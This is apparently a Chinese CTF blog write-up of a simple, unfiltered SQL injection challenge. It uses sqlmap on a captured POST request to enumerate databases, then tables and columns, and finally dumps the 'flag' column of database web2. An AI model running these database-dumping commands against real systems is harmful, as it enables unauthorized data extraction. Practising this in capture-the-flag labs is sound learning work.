看到一道简单的sql注入题,没有过滤,可以乘机学习一下sqlmap的用法

在这里插入图片描述

测试发现,用户名和密码都能注,手工就不演示了,直接上sqlmap
首先,因为是post请求,所以先抓包,把数据保存到sqlmap目录下(这里我保存成test.txt)

在这里插入图片描述

然后运行命令

sqlmap.py -r test.txt --dbs   //跑数据库名

在这里插入图片描述

然后查web2的表名

sqlmap.py -r test.txt -D web2 --tables  //跑表名

在这里插入图片描述

接着查flag的列名

sqlmap.py -r test.txt -T flag --columns   //跑列名

在这里插入图片描述

最后将flag里的内容输出

sqlmap.py -r test.txt -D web2 -T flag -C flag --dump

在这里插入图片描述

最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏